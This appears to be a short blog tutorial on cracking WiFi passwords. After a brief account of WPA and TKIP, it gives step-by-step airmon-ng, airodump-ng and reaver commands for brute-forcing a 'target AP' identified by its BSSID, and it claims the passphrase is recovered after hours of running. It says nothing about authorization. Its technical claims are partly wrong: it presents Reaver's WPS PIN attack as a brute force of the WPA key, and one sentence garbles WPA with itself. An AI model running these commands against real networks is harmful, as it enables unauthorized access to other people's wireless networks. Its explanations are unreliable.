Previous post we discussed that WEP (Wired Equivalent Privacy/Wireless Encryption Protocol) is less secure mechanism since it use static key for encryption. So, we able to cracked it within few minutes.
After the generation of WEP, we use WPA (WiFi Protected Access) for wireless protection. WPA uses Temporal Key Integrity Protocol (TKIP) for encryption. In TKIP encryption key changes with every data packet, checks message integrity and generate unique keys for each wireless client. So, that makes WiFi more secure than WPA encryption.
But this isn’t say that WPA secure in 100%. There are some ways to crack WPA key as well.
1. Brute Force attack
2. Dictionary Attack
If someone uses dictionary word as a WPA passphrase easy way of cracking is “Dictionary” attacks. But if it is random key, “Brute Force” will be the easiest way of cracking. But this takes few hours to crack it.
Here we are talking about Brute force attack against WiFi protected setup is using a tool called “Reaver”. Reaver has installed in backtrack5.
1. Configure your Wireless card into monitor mode
# airmon-ng start wlan0
2. Use airdump to have BSSID of the target AP
# airodump-ng mon0 (mon0 is the monitor mode interface)
3. Run reaver with following command
# reaver -i mon0 -b BSSID
example #reaver -i mon0 -b 00:0E:2E:C9:57:C6
here you can add some parameters to speeding up the attack as bellow
example #reaver -i mon0 -b 00:0E:2E:C9:57:C6 -vv –dh-small
Your part is over now. Wait till reaver crack the WPA key. Normally this will take 4hr – 10hr.
Here we found the WPA passphrase key.